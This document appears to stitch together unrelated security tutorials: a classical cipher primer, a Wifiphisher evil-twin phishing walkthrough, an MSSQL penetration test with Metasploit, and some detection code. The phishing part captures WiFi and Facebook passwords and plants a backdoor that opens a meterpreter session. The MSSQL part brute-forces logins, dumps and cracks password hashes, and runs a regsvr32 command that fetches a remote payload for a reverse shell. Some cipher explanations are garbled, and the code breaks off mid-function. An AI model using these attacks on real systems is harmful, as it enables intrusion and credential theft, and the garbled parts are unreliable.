Beginner Guide to Classic Cryptography

Cryptography: It is a technique of scrambling a message using mathematical logic to keep the information secure. It protects the scrambled message from being hacked when it is transported over an insecure network, since it converts the readable message into unreadable text.

Plaintext: It is the content of data in readable form that needs to be shared over an insecure network.
Encrypting key: It is a random string of bits created particularly to scramble the plaintext information into unreadable text using mathematical logic. There are two types of encryption key: symmetric key and asymmetric key.

Cipher text: The output of encryption is cipher text, which is not readable by human beings.

Decrypting key: It is the key used to decipher the cipher text back into plaintext, using a symmetric or asymmetric key, so that the original message can be read.

Functionality of cryptosystem

·         Authentication: It is the process of verifying the identity of a valid person who communicates over a network, through his username and password.
·         Authorization: It refers to the process of granting or denying access to a network resource or service. Most of the computer security systems that we have today are based on a two-step mechanism. The first step is authentication, and the second step is authorization or access control, which allows the user to access various resources based on the user’s identity.
·         Confidentiality or privacy: It means the assurance that only authorized users can read or use confidential information. When cryptographic keys are used on plaintext to create cipher text, privacy is assigned to the information.
·         Integrity: Integrity is the security aspect that confirms that the original contents of information have not been altered or corrupted. There should not be any kind of modification of the information while it is transported over the network.
·         Non repudiation: Non repudiation makes sure that each party is liable for the message it sent. Without it, someone can communicate and then later either falsely deny the communication entirely or claim that it occurred at a different time, or even deny receiving any piece of information.

Types of Classical Cryptographic Algorithms
Caesar cipher
Caesar cipher is a type of substitution cipher in which each letter of the alphabet is swapped for a letter a certain distance away from that letter.
Algorithm
Step 0: Mathematically, map the letters to numbers (i.e., A = 1, B = 2, and so on).


Step 1: Select an integer key K between 1 and 25 (i.e., there are a total of 26 letters in the English language); let us say shift right by 3 letters, where A + 3 = D, B + 3 = E and so on.


Step 2: The encryption formula is “Add k mod 26”; that is, the original letter L becomes (L + k) % 26.
For example, encryption of “IGNITE” will look like:
C = E (L + K) % 26
Here L = I and K = 3
C = E (I + 3) % 26
C = E (9 + 3) % 26
C = E (12) % 26
C = E (L)
Hence encryption of IGNITE: LJQLWH


Step 3: The deciphering is “Subtract k mod 26”; that is, the encrypted letter L becomes (L - k) % 26.
For example, decryption of “LJQLWH” will look like:
C = D (L - K) % 26
C = D (L - 3) % 26
C = D (12 - 3) % 26
C = D (9) % 26
C = D (I)
Hence decryption of LJQLWH: IGNITE

Limitation: Caesar cipher is vulnerable to brute-force attack because it depends on a single key with 25 possible values if the plaintext is written in English. Consequently, by trying each option and checking which one results in a meaningful word, it is possible to find out the key. Once the key is found, the full cipher text can be deciphered accurately.
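
The brute-force weakness described above, as an added Python example (not code from the original article): it enciphers the article's IGNITE example and then recovers the key by trying all 25 shifts. Letters are numbered from A = 0 rather than A = 1, which gives the same cipher letters and keeps Z inside the mod 26 range; KNOWN_WORDS is a constructed word list standing in for a person checking for a meaningful word.

```python
import string

ALPHABET = string.ascii_uppercase


def caesar(text, k):
    """Shift every A-Z letter by k places; a negative k deciphers."""
    shifted = []
    for ch in text.upper():
        if ch in ALPHABET:
            shifted.append(ALPHABET[(ALPHABET.index(ch) + k) % 26])
        else:
            shifted.append(ch)  # spaces and punctuation pass through unchanged
    return "".join(shifted)


# Constructed word list standing in for "does this read as English?"
KNOWN_WORDS = {"IGNITE", "HACKING", "ARTICLES", "VISIT"}


def brute_force(ciphertext, words=KNOWN_WORDS):
    """Try all 25 keys and keep the candidates that contain a known word."""
    hits = []
    for k in range(1, 26):
        candidate = caesar(ciphertext, -k)
        if any(word in candidate for word in words):
            hits.append((k, candidate))
    return hits


if __name__ == "__main__":
    print(caesar("IGNITE", 3))
    print(brute_force("LJQLWH"))
```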

Monoalphabetic Cipher

It is also a type of substitution cipher in which each letter of the alphabet is swapped using some permutation of the letters of the alphabet. Hence the number of permutations of 26 letters is 26! (factorial of 26), which is equal to 4 x 10^26. This technique uses a random key for every single letter for encryption, which makes the monoalphabetic cipher secure against brute-force attack.

The sender and the receiver decide on a randomly selected permutation of the letters of the alphabet. For example, in the word “HACKING” replace G with “J” and N with “W”; hence the permutation key is 2!, i.e. factorial of 2, and HACKING will become “HACKJIW”.

Algorithm
Step 0: Generate plaintext-cipher text pairs by mapping each plaintext letter to a different random cipher text letter IJKLQR--------GFE.


Step 1: To encipher, for each letter in the original text, replace the plaintext letter with a cipher text letter.
Hence encryption of “IGNITE” will be as shown below:


Step 2: For deciphering, reverse the procedure in step 1.
Hence decryption of “USBUOQ” will be “IGNITE”

Limitations
Despite its advantages, the random key for each letter in monoalphabetic substitution has some downsides too. It is very difficult to remember the order of the letters in the key, and therefore, it takes a lot of time and effort to encipher or decipher the text manually. Monoalphabetic substitution is vulnerable to frequency analysis.

Playfair Cipher

It encrypts digraphs, or pairs of letters, rather than single letters as the plain substitution cipher does.
In this cipher a 5x5 grid of the alphabet is created, which contains 25 letters instead of 26. One letter, “J” (or any other), is omitted. One would first fill in the spaces in the table with the letters of the keyword (dropping any duplicate letters), then fill the remaining spaces with the rest of the letters of the alphabet in order. If the plaintext contains J, then it is replaced by I.

Algorithm
Step 0: Split the plaintext into pairs; if the number of letters is odd, then add “X” after the last letter of the plaintext.
For example, “TABLE” is our plaintext; split it into pairs as: TA BL EX
Step 1: Set up the 5 × 5 matrix by filling the first positions with the key. Fill the rest of the matrix with the other letters. Let us assume “ARTI” is our key for encryption.


Step 2: Encryption involves three rules:
(1)    If both letters fall in the same row, substitute each with the letter to its right in a circular pattern. TA-----> IR


(2)    If both letters fall in different rows and columns, form a rectangle with the two letters and take the letters on the horizontally opposite corners of the rectangle. BL-----> TN


(3)    If both letters fall in the same column, substitute each letter with the letter below it in a circular pattern. EX-----> LT


Hence encryption of the word “TABLE” is “IR TN LT”.
Step 3: For decryption, the receiver uses the same key to decipher the text by reversing the above three rules used in step 2.

Limitations:
Playfair is considerably more complicated to break, but it is still vulnerable to frequency analysis, because in the case of Playfair frequency analysis is applied to the 25*25 = 625 possible digraphs rather than the 25 possible monographs (monoalphabetic).

Polyalphabetic Cipher

A polyalphabetic substitution cipher is a series of simple substitution ciphers. It is used to change each character of the plaintext with a variable length. The Vigenere cipher is a special example of the polyalphabetic cipher.

Algorithm
Step 0: Decide on an encrypting key to change plaintext into cipher text; for example, take “HACKING” as the encryption key, whose numerical representation is “7, 0, 2, 10, 8, 13, 6”.


Step 1: To encrypt, the number of the first letter of the key encrypts the first letter of the plaintext, the number of the second letter of the key encrypts the second letter of the plaintext, and so on.
For example, the plaintext is “VISIT TO HACKING ARTICLES” and the key is “HACKING: 7 0 2 10 8 13 6”.


Step 2: The encryption formula is “Add k mod 26”; that is, the original letter L becomes (L + k) % 26.
C = E (L + K) % 26
Here L = V and K = 7
C = E (V + 7) % 26
C = E (21 + 7) % 26
C = E (28) % 26
C = E (2)
C = E (C)
Hence encryption of “VISIT TO HACKING ARTICLES” is “CIUSBGUOAEUQAMHRVSKYKZ”


Step 3: The deciphering is “Subtract k mod 26”; that is, the encrypted letter L becomes (L - k) % 26.
For example, decryption of “CIUSBGUOAEUQAMHRVSKYKZ” will look like:
C = D (L - K) % 26
Here L = C and K = 7
C = D (C - 7) % 26
C = D (21)
C = D (V)
Hence decryption of “CIUSBGUOAEUQAMHRVSKYKZ” is “VISIT TO HACKING ARTICLES”

Limitation
The main limitation of the Vigenère cipher is the repeating character of its key. If a cryptanalyst properly estimates the length of the key, then the cipher text can be treated as linked Caesar ciphers, which can be easily broken separately.
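
The Vigenère steps and the repeating-key limitation above, as an added Python example (not code from the original article). It reproduces the article's cipher text for the key HACKING and then shows that every 7th letter was shifted by one fixed amount, so each column is an ordinary Caesar cipher; column_shifts is a helper name chosen here.

```python
import string

A = string.ascii_uppercase


def key_shifts(key):
    """Numeric form of the key with A = 0, e.g. HACKING -> 7 0 2 10 8 13 6."""
    return [A.index(c) for c in key.upper()]


def vigenere(text, key, decrypt=False):
    shifts = key_shifts(key)
    sign = -1 if decrypt else 1
    out, i = [], 0
    for ch in text.upper():
        if ch not in A:
            continue  # the article drops spaces before enciphering
        k = shifts[i % len(shifts)]  # the key repeats once it is used up
        out.append(A[(A.index(ch) + sign * k) % 26])
        i += 1
    return "".join(out)


def column_shifts(plaintext, ciphertext, key_len):
    """Set of shifts observed in each column of width key_len."""
    shifts = [set() for _ in range(key_len)]
    for i, (p, c) in enumerate(zip(plaintext, ciphertext)):
        shifts[i % key_len].add((A.index(c) - A.index(p)) % 26)
    return shifts


if __name__ == "__main__":
    cipher = vigenere("VISIT TO HACKING ARTICLES", "HACKING")
    plain = vigenere(cipher, "HACKING", decrypt=True)
    print(cipher, plain)
    # One shift per column: each column is a Caesar cipher on its own.
    print(column_shifts(plain, cipher, 7))
```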

Rotation cipher
A rotation cipher generates cipher text on the basis of the block size and the angle of rotation of the plaintext, in the direction of one of the following angles: 90°, 180°, 270°.

Algorithm
Step 0: Decide the size of the block for the plaintext “CRYPTOGRAPHY”; let us assume 6 as the block size.

CRYPTO
GRAPHY

Step 1: For encryption, arrange the plaintext in any direction among these angles, 90°, 180°, 270°, as shown below:
·         In 90° rotation, place the starting letter downwards vertically, from G to C and so on.

CRYPTO
GRAPHY

·         In 180° rotation, place the letters right to left horizontally, from O to C and so on.

CRYPTO
OTPYRC
GRAPHY
YHPARG

·         In 270° rotation, place the last letter top to bottom vertically, from O to Y and so on.
CRYPTO
GRAPHY

Hence the cipher text will be arranged in the following ways:



Step 2: Arrange the letters according to the angle they represent:
90° rotated cipher “GCRRAYPPHTYO”
180° rotated cipher “YHPARGOTPYRC”
270° rotated cipher “OYTHPPYARRCG”

Step 3: For decryption, any of the above three cipher texts can be decrypted using the block size and the angle of rotation.
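
How the three cipher texts above arise from the 2 x 6 block, as an added Python example (not code from the original article). The function names are chosen here, and the text length is assumed to be a multiple of the block size, as it is for CRYPTOGRAPHY.

```python
def rotate(text, block, angle):
    """Write text in rows of `block` letters, rotate the grid, read row by row."""
    if len(text) % block:
        raise ValueError("text length must be a multiple of the block size")
    rows = [text[i:i + block] for i in range(0, len(text), block)]
    if angle == 90:
        # columns left to right, each read from the bottom row upwards
        columns = zip(*reversed(rows))
    elif angle == 180:
        return text[::-1]
    elif angle == 270:
        # columns right to left, each read from the top row downwards
        columns = reversed(list(zip(*rows)))
    else:
        raise ValueError("angle must be 90, 180 or 270")
    return "".join("".join(col) for col in columns)


def unrotate(cipher, block, angle):
    """Undo rotate(): the rotated grid is as wide as the plaintext had rows."""
    rows_in_plain = len(cipher) // block
    return rotate(cipher, rows_in_plain, 360 - angle)


if __name__ == "__main__":
    for angle in (90, 180, 270):
        cipher = rotate("CRYPTOGRAPHY", 6, angle)
        print(angle, cipher, unrotate(cipher, 6, angle))
```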

Transposition cipher
In a transposition cipher the plaintext letters are rearranged without replacing the original letters with others, in contrast to the above cipher techniques.

Algorithm

Step 0: Decide the keyword that will represent the number of columns of a table which stores the plaintext inside it and helps in generating the cipher text; let us suppose we choose CIPHER as the key.
Step 1: Store the plaintext “classical cryptography” in a table, cell by cell from left to right.




Step 2: For encryption, arrange all letters by column, taking the columns in ascending order of the keyword; “CIPHER” will be CEHIPR, as:



Column 1: CCCPP
Column 2: ESRR
Column 3: HSCG
Column 4: PALOY
Column 5: RIYA
Hence the cipher obtained will be “CCCPPESRRHSCGPALOYRIYA”
Step 3: For decryption, the receiver uses the key to rearrange the 26 cipher letters according to their columns in a 6*5 matrix.

Limitation
It is very easy to rearrange the cipher letters if the correct key is guessed.

Rail fence cipher

The 'rail fence cipher', also called a zigzag cipher, is a form of transposition cipher in which the plain text is written downwards and diagonally on successive "rails" of an imaginary fence, then moving up when we reach the bottom rail.

Algorithm
Step 0: Choose the number of rails, which will act as the key for plotting the plaintext. Here 3 rails are chosen as the key for encryption.
Step 1: Plot the plaintext “RAJ CHANDEL” on the rails in zigzag form, in the direction top to bottom (downwards and diagonally) and then bottom to top (upwards and diagonally).



Step 2: For encryption, place all letters horizontally, starting from row 1 to row 3, as:
Row 1: RHE
Row 2: ACADL
Row 3: JN
Hence encryption for “RAJCHANDEL” is “RHEACADLJN”

Step 3: For decryption, generate the matrix by multiplying the total number of cipher text letters by the number of rails; here there are 10 letters in total in the cipher text “RHEACADLJN” and 3 rails, hence the matrix will be 10*3.

Reverse the rule used in encryption above and place the cipher text as:

Row 1: RHE


Row 2: ACADL


Row 3: JN


Limitations
The rail fence cipher is not very strong; the number of practical keys (the number of rails) is small enough that a cryptanalyst can try them all by hand.
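
The zigzag layout, its inverse and the small key space described above, as an added Python example (not code from the original article). It reproduces RAJ CHANDEL -> RHEACADLJN with 3 rails and then lists the plaintext for every possible rail count; the function names are chosen here.

```python
def rail_pattern(length, rails):
    """Rail index of each position: 0, 1, .., rails-1, rails-2, .., 1, 0, .."""
    if rails < 2:
        return [0] * length
    cycle = list(range(rails)) + list(range(rails - 2, 0, -1))
    return [cycle[i % len(cycle)] for i in range(length)]


def rail_encrypt(text, rails):
    letters = [c for c in text.upper() if c.isalpha()]
    pattern = rail_pattern(len(letters), rails)
    # read rail 0 left to right, then rail 1, and so on
    return "".join(c for r in range(rails)
                   for c, p in zip(letters, pattern) if p == r)


def rail_decrypt(cipher, rails):
    pattern = rail_pattern(len(cipher), rails)
    # plaintext positions in the order the cipher text lists them
    order = sorted(range(len(cipher)), key=lambda i: pattern[i])
    plain = [""] * len(cipher)
    for ch, position in zip(cipher, order):
        plain[position] = ch
    return "".join(plain)


def all_guesses(cipher):
    """Every candidate plaintext: the key is only the rail count."""
    return {rails: rail_decrypt(cipher, rails)
            for rails in range(2, len(cipher))}


if __name__ == "__main__":
    cipher = rail_encrypt("RAJ CHANDEL", 3)
    print(cipher)
    for rails, guess in all_guesses(cipher).items():
        print(rails, guess)
```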

WiFi Exploitation with WifiPhisher

Hello friends! Today we are going to demonstrate a WiFi phishing attack using a very great tool, “Wifiphisher”; please read its description for more details.

Wifiphisher is a security tool that mounts automated victim-customized phishing attacks against WiFi clients in order to obtain credentials or infect the victims with malware. It is primarily a social engineering attack that, unlike other methods, does not include any brute forcing. It is an easy way of obtaining credentials from captive portals and third party login pages (e.g. in social networks) or WPA/WPA2 pre-shared keys.

Requirement
·         Kali Linux.
·         Two wifi adapters: one that supports AP mode and another that supports monitor mode.

Wifiphisher Working

After achieving a man-in-the-middle position using the Evil Twin or KARMA attack, Wifiphisher redirects all HTTP requests to an attacker-controlled phishing page.
From the victim's perspective, the attack takes place in three phases:
1.       Victim is being deauthenticated from her access point. Wifiphisher continuously jams all of the target access point's wifi devices within range by forging “Deauthenticate” or “Disassociate” packets to disrupt existing associations.
2.       Victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point's settings. It then creates a rogue wireless access point that is modeled by the target. It also sets up a NAT/DHCP server and forwards the right ports. Consequently, because of the jamming, clients will eventually start connecting to the rogue access point. After this phase, the victim is MiTMed. Furthermore, Wifiphisher listens to probe request frames and spoofs "known" open networks to cause automatic association.
3.       Victim is being served a realistic specially-customized phishing page. Wifiphisher employs a minimal web server that responds to HTTP & HTTPS requests. As soon as the victim requests a page from the Internet, wifiphisher will respond with a realistic fake page that asks for credentials or serves malware. This page will be specifically crafted for the victim. For example, a router config-looking page will contain logos of the victim's vendor. The tool supports community-built templates for different phishing scenarios.
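
Phases 1 and 2 leave traces a wireless sensor can see: a burst of deauthentication frames aimed at the real access point, and the same ESSID advertised from a BSSID that is not in the inventory. The following is an added Python example of that check (not part of the original article or of Wifiphisher); the baseline, beacon records, frame records, threshold and the security comparison are assumptions constructed for illustration.

```python
from collections import Counter

# Constructed baseline of authorised access points (hypothetical values).
BASELINE = {"iball-baton": {"bssids": {"00:11:22:33:44:55"}, "security": "WPA2"}}

# Constructed beacon observations from a monitor-mode sensor.
BEACONS = [
    {"essid": "iball-baton", "bssid": "00:11:22:33:44:55", "security": "WPA2"},
    {"essid": "iball-baton", "bssid": "02:aa:bb:cc:dd:ee", "security": "OPEN"},
    {"essid": "cafe-guest", "bssid": "00:99:88:77:66:55", "security": "OPEN"},
]

# Constructed management frames: (timestamp in seconds, subtype, BSSID).
FRAMES = [(100.0 + i * 0.02, "deauth", "00:11:22:33:44:55") for i in range(40)]
FRAMES.append((130.5, "deauth", "00:99:88:77:66:55"))


def rogue_twins(beacons, baseline):
    """Known ESSIDs advertised by a BSSID that is not in the baseline."""
    alerts = []
    for beacon in beacons:
        known = baseline.get(beacon["essid"])
        if known is None or beacon["bssid"] in known["bssids"]:
            continue  # not our network, or one of our own radios
        reason = "unknown BSSID"
        if beacon["security"] != known["security"]:
            reason += ", security changed to " + beacon["security"]
        alerts.append((beacon["essid"], beacon["bssid"], reason))
    return alerts


def deauth_floods(frames, threshold=20):
    """BSSIDs that received `threshold` or more deauth/disassoc frames in one second."""
    per_second = Counter((bssid, int(ts)) for ts, subtype, bssid in frames
                         if subtype in ("deauth", "disassoc"))
    return sorted({bssid for (bssid, _), n in per_second.items() if n >= threshold})


def correlate(beacons, frames, baseline):
    """ESSIDs whose real AP is being flooded while a twin is on the air."""
    flooded = set(deauth_floods(frames))
    return [essid for essid, _, _ in rogue_twins(beacons, baseline)
            if baseline[essid]["bssids"] & flooded]
```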

Let’s start!!!
Open the terminal in Kali Linux and type the following command to download wifiphisher from GitHub.

git clone https://github.com/wifiphisher/wifiphisher.git


Once it is downloaded, run the Python file to install it and its dependencies as shown below:
cd wifiphisher/
python setup.py install


Now run the script by typing wifiphisher in the terminal to launch the wifi-phishing attack, which is similar to social engineering.


Here it will fetch all interfaces as shown in the given image and let the attacker choose any one ESSID/BSSID of the target network and try to trap the victim by performing phishing. It will also perform both Evil Twin and KARMA attacks.

From the list of interfaces, I had targeted “iball-baton” to trap the victim connecting from it.


After that you will get 4 phishing scenarios to trap your target, as given below:
1.       Firmware Upgrade page
2.       Network Manager connect
3.       Browser plugin update
4.       OAuth Login Page

Now let’s go through each phishing scenario one by one starting from 1st option.

Firmware Upgrade page: A router configuration page without logos or brands asking for the WPA/WPA2 password due to a firmware upgrade.


The victim may consider it an official notification and go for the upgrade by submitting his WiFi password. As the victim enters the WPA/WPA2 password and clicks on start upgrade, he will get trapped in a fake upgrade process.


The following image pretends to the victim that the firmware is being upgraded and that the process should not be closed until it is completed, while in the background the attacker has captured the WPA/WPA2 password.




Once again repeat the same step to select ESSID.


Now let us go through another phishing scenario from 2nd option.

Network Manager Connect: Imitates the behavior of the network manager. This template shows Chrome's “Connection Failed” page and displays a network manager window through the page asking for the pre-shared key. Currently, the network managers of Windows and Mac OS are supported.


Here the target will click on “connect” to reconnect with the interface.


It asks for the password to connect with the selected interface, while in the background the attacker captures the WPA/WPA2 password.



Great!! Again you can confirm the WPA/WPA2 password as shown in the image given below; it has captured the WPA password: ram123456ram


Repeat same step to choose ESSID for attack.


Browser plugin update: A generic browser plugin update page that can be used to serve payloads to the victims.


It will create an exe payload and run a multi handler in the background for a reverse connection from the victim's system.





Now when the victim clicks on Update Now, it will start downloading an update.exe file onto the victim’s system, which is nothing but an exe backdoor file for gaining unauthorized access to his system.


Awesome!! The attacker will get a reverse connection from the target’s system; from the image given below you can see it has opened meterpreter session 1.


Repeat same step to choose ESSID for attack.


Now move forward with its last option i.e. 4th option.

OAuth Login Page: A free Wi-Fi service asking for Facebook credentials to authenticate using OAuth.


At this time, when the victim opens the browser he may get trapped by the phishing page titled “Get Connect to the Internet For free”, as shown in the given image.
So when the victim enters his Facebook credentials to access free internet, he will get trapped in that phishing attack.


Here you can see that as the victim enters the username and password and clicks on login for the Facebook connection, he gets an error message; meanwhile the attacker has captured the victim’s Facebook credentials.


Wonderful!! The attacker successfully traps the victim and fetches his Facebook account credentials.


MSSQL Penetration Testing with Metasploit

Hello friends, today we are performing MSSQL penetration testing using the Metasploit framework in order to retrieve basic information such as database names, usernames, table names, etc. from inside a SQL Server running on the Windows operating system. In our previous article we had set up Microsoft SQL Server on Windows 10.
Requirement
Attacker: Kali Linux (NMAP)
Target: Windows 10 (MS SQL Server)
Let’s start!!

MSSQL Brute force Attack

This module simply queries the MSSQL instance for a specific user/pass (default is sa with blank).

use auxiliary/scanner/mssql/mssql_login
msf auxiliary(mssql_login) > set rhosts 192.168.1.104
msf auxiliary(mssql_login) > set user_file /root/Desktop/user.txt
msf auxiliary(mssql_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(mssql_login) > run


This will perform a brute force attack, matching valid combinations of username and password from the given dictionaries.


In the specified image you can observe that we had successfully retrieved credentials for two users:
Username: ignite and password: 12345


Username: sa and password: 123
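
Seen from the server, the dictionary attack above is a run of failed logons from one client followed by a success. The following added Python example (not part of the original article) looks for that pattern in SQL Server error log lines; it assumes login auditing records both failed and successful logins, and the sample lines, date and the client 192.168.1.50 are constructed for illustration.

```python
import re
from collections import defaultdict

LINE = re.compile(
    r"^(?P<ts>\S+ \S+)\s+Logon\s+Login (?P<result>failed|succeeded) for user "
    r"'(?P<user>[^']*)'.*\[CLIENT: (?P<client>[^\]]+)\]")

# Constructed sample in the SQL Server error log layout.
SAMPLE_LOG = """\
2017-10-05 11:02:13.10 Logon       Error: 18456, Severity: 14, State: 8.
2017-10-05 11:02:13.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.115]
2017-10-05 11:02:13.31 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.115]
2017-10-05 11:02:13.52 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.115]
2017-10-05 11:02:13.74 Logon       Login failed for user 'ignite'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.115]
2017-10-05 11:02:13.95 Logon       Login failed for user 'ignite'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.115]
2017-10-05 11:02:14.16 Logon       Login failed for user 'ignite'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.115]
2017-10-05 11:02:14.40 Logon       Login succeeded for user 'ignite'. Connection made using SQL Server authentication. [CLIENT: 192.168.1.115]
2017-10-05 11:02:14.90 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.115]
2017-10-05 11:02:15.20 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 192.168.1.115]
2017-10-05 11:30:00.00 Logon       Login failed for user 'report'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.50]
2017-10-05 11:30:09.00 Logon       Login succeeded for user 'report'. Connection made using SQL Server authentication. [CLIENT: 192.168.1.50]
"""


def analyse(log_text, min_failures=5):
    """Report logins that succeeded from a client with many earlier failures."""
    failures = defaultdict(list)  # client address -> logins that failed
    findings = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # e.g. the separate "Error: 18456" line
        client, user = m["client"], m["user"]
        if m["result"] == "failed":
            failures[client].append(user)
        elif len(failures[client]) >= min_failures:
            findings.append({
                "time": m["ts"],
                "client": client,
                "compromised_login": user,
                "failed_attempts": len(failures[client]),
                "logins_tried": sorted(set(failures[client])),
            })
    return findings


if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG):
        print(finding)
```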



This module will perform a series of configuration audits and security checks against a Microsoft SQL Server database. For this module to work, valid administrative user credentials must be supplied.

use auxiliary/admin/mssql/mssql_enum
msf auxiliary(mssql_enum) > set rhosts 192.168.1.104
msf auxiliary(mssql_enum) > set password admin123
msf auxiliary(mssql_enum) > run

The above module has dumped the MSSQL configuration settings, where you can observe enabled and disabled functions. For example:
xp_cmdshell is enabled, which is a function of Microsoft SQL Server that allows system administrators to execute operating system commands. An attacker can inject a malicious command or file to gain unauthorized access to the server.



This module can be used to obtain a list of all logins from a SQL Server with any login. Selecting all of the logins from the master..syslogins table is restricted to sysadmins. However, logins with the PUBLIC role (everyone) can quickly enumerate all SQL Server logins using the SUSER_SNAME function by fuzzing the principal_id parameter. This is pretty simple, because the principal IDs assigned to logins are incremental. Once logins have been enumerated they can be verified via sp_defaultdb error analysis. This is important, because not all of the principal IDs resolve to SQL logins (some resolve to roles instead). Once logins have been enumerated, they can be used in dictionary attacks.
use auxiliary/admin/mssql/mssql_enum_sql_logins
msf auxiliary(mssql_enum_sql_logins) > set rhosts 192.168.1.104
msf auxiliary(mssql_enum_sql_logins) > set password admin123
msf auxiliary(mssql_enum_sql_logins) > run


From the image given below you can confirm the MSSQL Server logins, such as “sa”, which is also sysadmin, and another user, “ignite”. Once you have enumerated all logins, you can then make a dictionary attack on their passwords.


Identify Database owner
This module can be used to escalate privileges to sysadmin if the user has the db_owner role in a trustworthy database owned by a sysadmin user. Once the user has the sysadmin role the mssql_payload module can be used to obtain a shell on the system.

use auxiliary/admin/mssql/mssql_escalate_dbowner
msf auxiliary(mssql_escalate_dbowner) > set rhosts 192.168.1.104
msf auxiliary(mssql_escalate_dbowner) > set password admin123
msf auxiliary(mssql_escalate_dbowner) > run

The above module will identify whether the specified user has the system administrator role or not. From the image given below you can perceive that “sa” is a sysadmin user.


Identify a User With masquerade privilege

This module can be used to escalate privileges if the IMPERSONATION privilege has been assigned to the user. In most cases, this results in additional data access, but in some cases it can be used to gain sysadmin privileges.
use auxiliary/admin/mssql/mssql_escalate_execute_as
msf auxiliary(mssql_escalate_execute_as) > set rhosts 192.168.1.104
msf auxiliary(mssql_escalate_execute_as) > set password admin123
msf auxiliary(mssql_escalate_execute_as) > run

From the image given below you can perceive that “sa” is a sysadmin user.


Execute SQL Statement

This module will allow for simple SQL statements to be executed against a MSSQL/MSDE instance given the appropriate credentials.
use auxiliary/admin/mssql/mssql_sql
msf auxiliary(mssql_sql) > set rhosts 192.168.1.104
msf auxiliary(mssql_sql) > set password admin123
msf auxiliary(mssql_sql) > run

From the image given below you can observe that by default it has run a SQL statement to select the version; as a result it has dumped the complete version details of the SQL Server. Here you can execute your own SQL statement.


Retrieve MSSQL Password Hashes of Users

This module extracts the usernames and encrypted password hashes from a MSSQL server and stores them for later cracking. This module also saves information about the server version and table names, which can be used to seed the wordlist.

use auxiliary/scanner/mssql/mssql_hashdump
msf auxiliary(mssql_hashdump) > set rhosts 192.168.1.104
msf auxiliary(mssql_hashdump) > set password admin123
msf auxiliary(mssql_hashdump) > run

From the image given below you can read the hash value of the password set for every database user in the MSSQL server.



This module uses John the Ripper to identify weak passwords that have been acquired from the mssql_hashdump module. Passwords that have been successfully cracked are then saved as proper credentials.
use auxiliary/analyze/jtr_mssql_fast
msf auxiliary(jtr_mssql_fast) > run

Great!! The tool John the Ripper has successfully decoded the hash values set for the passwords.


This module attempts to extract the schema from a MSSQL Server Instance. It will disregard builtin and example DBs such as master, model, msdb, and tempdb. The module will create a note for each DB found, and store a YAML formatted output as loot for easy reading.

use auxiliary/scanner/mssql/mssql_schemadump
msf auxiliary(mssql_schemadump) > set rhosts 192.168.1.104
msf auxiliary(mssql_schemadump) > set password admin123
msf auxiliary(mssql_schemadump) > run

Here it has dumped the information schema for database “ignite” with table name “student”, 4 column names with column types:
DB: ignite
Table name: student_details
Ranking (CT: numeric; CL = 9)
NAME (CT: nvarchar; CL = 100)
Class (CT: nchar; CL = 20)
Name (CT: sysname; CL = 100)



This module simplifies the Regsvr32.exe Application Whitelisting Bypass technique. The module creates a web server that hosts an .sct file. When the user types the provided regsvr32 command on a system, regsvr32 will request the .sct file and then execute the included PowerShell command. This command then downloads and executes the specified payload (similar to the web_delivery module with PSH). Both web requests (i.e., the .sct file and PowerShell download and execute) can occur on the same port.

use exploit/windows/misc/regsvr32_applocker_bypass_server
msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.1.115
msf exploit(regsvr32_applocker_bypass_server) > set lport 4455
msf exploit(regsvr32_applocker_bypass_server) > run

Since we know the xp_cmdshell function is enabled in the SQL Server, we can easily shoot the target machine by injecting a malicious .dll file through the xp_cmdshell function.
After executing the above module we will get the malicious .dll code as highlighted in the image below; copy this code for injecting into xp_cmdshell as a statement.



use auxiliary/admin/mssql/mssql_exec
msf auxiliary(mssql_exec) > set rhosts 192.168.1.104
msf auxiliary(mssql_exec) > set password admin123
msf auxiliary(mssql_exec) > set CMD "regsvr32 /s /n /u /i:http://192.168.1.115:8080/P8LsfwnWN.sct scrobj.dll"
msf auxiliary(mssql_exec) > run

If you observe the command set in the specified module above, you will notice that here we have set the malicious .dll code copied above as the CMD statement. Hence as soon as we run this exploit it creates a backdoor in the victim’s machine for unauthorized access.

Wonderful!! We have got a reverse connection from the target machine through a meterpreter session.
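
On the database host this chain is visible in process-creation telemetry: xp_cmdshell makes sqlservr.exe start cmd.exe, and the regsvr32 command line carries an /i:http URL together with scrobj.dll. The following added Python example (not part of the original article or of Metasploit) flags both signs; the event field names, the sqlservr.exe install path and the benign events are assumptions constructed for illustration, and the malicious command line is the one shown above.

```python
import ntpath
import re

# regsvr32 asked to fetch a scriptlet over HTTP(S) and run it through scrobj.dll
REMOTE_SCRIPTLET = re.compile(
    r"regsvr32(\.exe)?\b.*[/-]i:\s*https?://\S+.*\bscrobj\.dll", re.IGNORECASE)
SHELLS = {"cmd.exe", "powershell.exe"}

# Constructed process-creation events (parent image, image, command line).
SQLSERVR = (r"C:\Program Files\Microsoft SQL Server"
            r"\MSSQL13.MSSQLSERVER\MSSQL\Binn\sqlservr.exe")
EVENTS = [
    {"parent": SQLSERVR, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "cmd.exe /c regsvr32 /s /n /u "
            "/i:http://192.168.1.115:8080/P8LsfwnWN.sct scrobj.dll"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmd": "regsvr32 /s /n /u "
            "/i:http://192.168.1.115:8080/P8LsfwnWN.sct scrobj.dll"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmd": r"regsvr32 /s C:\Windows\System32\msxml3.dll"},
    {"parent": r"C:\Windows\System32\services.exe", "image": SQLSERVR,
     "cmd": "sqlservr.exe -sMSSQLSERVER"},
]


def name(path):
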